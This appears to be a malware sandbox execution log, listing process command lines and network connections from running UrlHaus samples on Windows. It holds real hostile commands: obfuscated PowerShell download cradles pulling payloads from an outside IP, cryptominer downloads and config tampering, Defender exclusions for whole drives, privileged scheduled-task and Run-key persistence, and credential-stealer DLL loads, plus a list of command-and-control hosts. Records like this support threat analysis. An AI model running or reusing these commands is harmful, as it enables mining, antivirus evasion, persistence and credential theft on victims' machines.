"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2016,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"
C:\Users\Admin\AppData\Roaming\run.exe
run.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2372,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2240,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4044,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4976,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D59.tmp\5D5A.tmp\5D5B.bat C:\Users\Admin\AppData\Roaming\run.exe"
C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe
"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8700 -ip 8700
C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
"C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8700 -s 536
C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezdDMjRFNERDLTc0MTUtNEM4Mi1CQUNGLTM4NTdEQ0FBODU3NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuNjc3OC44NiIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1MiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYWRtZ3hsdDRkNWM1cmN0bm96dzN3enBodzJ3cV8xMzEuMC42Nzc4Ljg2LzEzMS4wLjY3NzguODZfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgZG93bmxvYWRfdGltZV9tcz0iMjMxODYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijk4OSIgZG93bmxvYWRfdGltZV9tcz0iMjQ3NjAiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSIzNzQxMSIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe
"C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im FLiNGTrainerUpdater.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im FLiNGTrainer.exe
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe
"C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Users\Admin\Downloads\UrlHausFiles\test26.exe
"C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 996
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted')
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1324,2511817535852043756,16234768005361468078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
C:\Users\Admin\Downloads\UrlHausFiles\stail.exe
"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp" /SL5="$A0202,3886989,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause coder_media_11281
C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gumlnlfe\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause coder_media_11281
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "eBGamer45" -Value "C:\ProgramData\BridgeGamer\BridgeGamer.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
C:\Users\Admin\Downloads\UrlHausFiles\bin.exe
"C:\Users\Admin\Downloads\UrlHausFiles\bin.exe"
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
C:\Windows\SYSTEM32\wscript.exe
"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 46102' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\Network46102Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Windows\SysWOW64\netbtugc.exe
"C:\Windows\SysWOW64\netbtugc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "Fix Getting Devices" /F
C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x470
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "Windows Optimize" /F
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "ChangeWallpaper" /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| N/A | 127.0.0.1:50804 | tcp | |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nine.ddns.net | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| NL | 45.200.148.45:443 | tcp | |
| NL | 45.200.148.45:443 | tcp | |
| NL | 45.200.148.45:443 | tcp | |
| CN | 139.196.31.48:14417 | tcp | |
| CN | 139.196.31.48:2324 | tcp | |
| JP | 121.1.252.90:80 | 121.1.252.90 | tcp |
| CN | 114.215.27.238:2324 | tcp | |
| CN | 101.229.61.157:8072 | tcp | |
| CN | 114.215.27.238:8100 | tcp | |
| CN | 110.90.9.121:8072 | tcp | |
| CN | 114.215.27.238:8072 | tcp | |
| CN | 61.144.96.138:888 | tcp | |
| TR | 5.26.97.52:88 | 5.26.97.52 | tcp |
| JP | 122.31.166.101:80 | 122.31.166.101 | tcp |
| CH | 138.188.34.220:80 | 138.188.34.220 | tcp |
| IN | 111.118.250.244:80 | 111.118.250.244 | tcp |
| CA | 76.11.16.231:80 | 76.11.16.231 | tcp |
| TR | 178.242.54.178:80 | 178.242.54.178 | tcp |
| US | 75.18.210.21:80 | 75.18.210.21 | tcp |
| HK | 219.77.72.53:80 | 219.77.72.53 | tcp |
| BR | 179.89.224.192:80 | 179.89.224.192 | tcp |
| CA | 99.233.83.22:80 | 99.233.83.22 | tcp |
| MO | 202.175.60.117:80 | 202.175.60.117 | tcp |
| FR | 80.15.103.89:80 | 80.15.103.89 | tcp |
| CN | 112.27.225.72:8001 | tcp | |
| CN | 110.40.250.173:2324 | tcp | |
| CN | 113.85.101.199:81 | tcp | |
| US | 67.190.47.69:8081 | 67.190.47.69 | tcp |
| CN | 124.70.36.56:80 | tcp | |
| KR | 121.142.127.237:8605 | 121.142.127.237 | tcp |
| CN | 121.235.184.125:9000 | tcp | |
| CN | 61.183.16.127:14417 | tcp | |
| CN | 58.208.14.94:88 | tcp | |
| TR | 178.242.54.178:88 | 178.242.54.178 | tcp |
| KR | 218.155.74.6:7070 | 218.155.74.6 | tcp |
| CN | 150.158.146.215:80 | tcp | |
| CN | 49.81.40.231:111 | tcp | |
| BR | 187.59.102.238:9090 | 187.59.102.238 | tcp |
| CN | 111.42.156.130:8000 | tcp | |
| CN | 49.81.203.0:111 | tcp | |
| BR | 189.61.50.98:8080 | 189.61.50.98 | tcp |
| US | 159.250.122.151:8081 | 159.250.122.151 | tcp |
| CN | 47.103.126.166:8072 | tcp | |
| US | 68.59.153.1:49274 | 68.59.153.1 | tcp |
| HK | 149.88.73.206:80 | 149.88.73.206 | tcp |
| US | 141.155.36.213:41790 | 141.155.36.213 | tcp |
| CA | 184.145.33.5:80 | 184.145.33.5 | tcp |
| CN | 43.241.17.145:8899 | tcp | |
| KR | 121.154.20.150:80 | 121.154.20.150 | tcp |
| US | 96.250.166.185:88 | 96.250.166.185 | tcp |
| US | 24.252.169.236:80 | 24.252.169.236 | tcp |
| CA | 76.67.131.51:80 | 76.67.131.51 | tcp |
| MX | 187.144.154.105:80 | 187.144.154.105 | tcp |
| CA | 76.68.62.152:80 | 76.68.62.152 | tcp |
| CA | 99.234.132.85:80 | 99.234.132.85 | tcp |
| MX | 187.225.233.208:80 | 187.225.233.208 | tcp |
| KR | 14.37.138.88:8602 | 14.37.138.88 | tcp |
| CA | 142.67.169.45:80 | 142.67.169.45 | tcp |
| BE | 109.137.108.215:8083 | 109.137.108.215 | tcp |
| US | 166.145.98.1:80 | 166.145.98.1 | tcp |
| FR | 109.210.138.197:80 | 109.210.138.197 | tcp |
| TR | 5.26.174.234:80 | 5.26.174.234 | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server2.top | udp |
| TH | 103.230.121.124:80 | nine.ddns.net | tcp |
| US | 8.8.8.8:53 | security-service-api-link.cc | udp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server5.top | udp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| TH | 103.230.121.124:443 | nine.ddns.net | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| SE | 85.230.143.101:80 | 85.230.143.101 | tcp |
| US | 8.8.8.8:53 | ns.smallsrv.com | udp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| US | 8.8.8.8:53 | palharesinformatica.com.br | udp |
| NL | 4.180.120.64:8000 | 4.180.120.64 | tcp |
| CN | 139.198.15.223:8080 | tcp | |
| ES | 94.76.156.101:280 | 94.76.156.101 | tcp |
| LK | 192.248.13.186:80 | 192.248.13.186 | tcp |
| IN | 122.170.110.131:9105 | 122.170.110.131 | tcp |
| CN | 36.138.125.70:8089 | tcp | |
| CN | 101.126.11.168:80 | tcp | |
| CN | 39.100.33.142:9092 | tcp | |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| CN | 42.193.42.92:80 | tcp | |
| VN | 103.77.173.146:80 | 103.77.173.146 | tcp |
| RU | 46.17.104.173:80 | ns.smallsrv.com | tcp |
| US | 8.8.8.8:53 | www.hseda.com | udp |
| US | 8.8.8.8:53 | xinhgai.tv | udp |
